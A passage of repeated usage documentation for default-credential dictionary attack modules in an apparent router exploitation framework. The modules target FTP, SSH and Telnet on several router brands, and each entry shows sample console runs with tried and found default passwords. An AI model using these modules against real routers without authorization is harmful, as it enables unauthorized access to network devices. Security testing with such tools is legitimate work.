valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/fortinet/ftp_default_creds rsf (Fortinet Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Fortinet Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/fortinet/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Fortinet Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/fortinet/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/fortinet/ssh_default_creds rsf (Fortinet Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Fortinet Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/fortinet/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Fortinet Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/fortinet/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/fortinet/telnet_default_creds rsf (Fortinet Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Fortinet Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/huawei/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Huawei Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/huawei/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/huawei/ftp_default_creds rsf (Huawei Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Huawei Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/huawei/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Huawei Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/huawei/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/huawei/ssh_default_creds rsf (Huawei Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Huawei Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/huawei/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Huawei Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/huawei/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/huawei/telnet_default_creds rsf (Huawei Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Huawei Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/ipfire/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against IPFire Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/ipfire/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/ipfire/ftp_default_creds rsf (IPFire Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (IPFire Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/ipfire/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against IPFire Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/ipfire/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/ipfire/ssh_default_creds rsf (IPFire Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (IPFire Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/ipfire/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against IPFire Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/ipfire/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/ipfire/telnet_default_creds rsf (IPFire Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (IPFire Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/juniper/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Juniper Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/juniper/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/juniper/ftp_default_creds rsf (Juniper Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Juniper Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/juniper/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Juniper Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/juniper/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/juniper/ssh_default_creds rsf (Juniper Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Juniper Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/juniper/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Juniper Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/juniper/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/juniper/telnet_default_creds rsf (Juniper Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Juniper Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/linksys/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Linksys Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/linksys/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/linksys/ftp_default_creds rsf (Linksys Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Linksys Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/linksys/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Linksys Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/linksys/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/linksys/ssh_default_creds rsf (Linksys Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Linksys Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/linksys/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Linksys Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/linksys/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/linksys/telnet_default_creds rsf (Linksys Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Linksys Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/mikrotik/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Mikrotik Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/mikrotik/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/mikrotik/ftp_default_creds rsf (Mikrotik Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Mikrotik Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/mikrotik/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Mikrotik Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/mikrotik/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/mikrotik/ssh_default_creds rsf (Mikrotik Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Mikrotik Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/mikrotik/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Mikrotik Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/mikrotik/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/mikrotik/telnet_default_creds rsf (Mikrotik Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Mikrotik Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/movistar/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Movistar Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/movistar/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/movistar/ftp_default_creds rsf (Movistar Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Movistar Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/movistar/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Movistar Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/movistar/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/movistar/ssh_default_creds rsf (Movistar Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Movistar Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/movistar/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Movistar Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/movistar/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/movistar/telnet_default_creds rsf (Movistar Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Movistar Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/netcore/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Netcore Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/netcore/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/netcore/ftp_default_creds rsf (Netcore Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Netcore Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/netcore/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Netcore Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/netcore/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/netcore/ssh_default_creds rsf (Netcore Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Netcore Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/netcore/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Netcore Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/netcore/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/netcore/telnet_default_creds rsf (Netcore Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Netcore Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/netgear/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Netgear Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/netgear/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/netgear/ftp_default_creds rsf (Netgear Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Netgear Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/netgear/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Netgear Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/netgear/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/netgear/ssh_default_creds rsf (Netgear Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Netgear Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/netgear/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Netgear Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/netgear/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/netgear/telnet_default_creds rsf (Netgear Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Netgear Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] 